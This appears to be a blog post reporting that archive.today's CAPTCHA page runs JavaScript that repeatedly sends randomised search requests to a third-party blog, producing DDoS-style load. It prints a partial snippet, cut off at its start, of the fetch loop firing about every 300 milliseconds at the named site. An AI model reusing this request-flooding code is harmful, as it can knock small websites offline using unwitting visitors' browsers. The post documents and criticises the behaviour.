Archive.today CAPTCHA Code Triggers DDoS-Style Traffic Against a Blog
Archive.today CAPTCHA Code Triggers DDoS-Style Traffic Against a Blog
An investigation has revealed that archive.today runs client-side JavaScript on its CAPTCHA page that repeatedly sends requests to a third-party blog. When left open, this behavior generates traffic patterns consistent with a DDoS-style attack.
This is not speculation. The code executes automatically in a visitor’s browser and fires requests roughly every 300 milliseconds. For small or independent blogs, this level of sustained traffic can cause slowdowns, service disruption, or downtime.
Observed JavaScript Behavior
fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
});
}, 300);
In simple terms: while the CAPTCHA page is open, the browser repeatedly contacts the target blog with random search requests. These requests bypass caching and continue nonstop.
Screenshots & Evidence
Why This Matters
This incident demonstrates how client-side code can unintentionally — or negligently — turn ordinary users into traffic sources for an attack. For independent site owners, this type of traffic can be financially and operationally damaging.
Comments
Post a Comment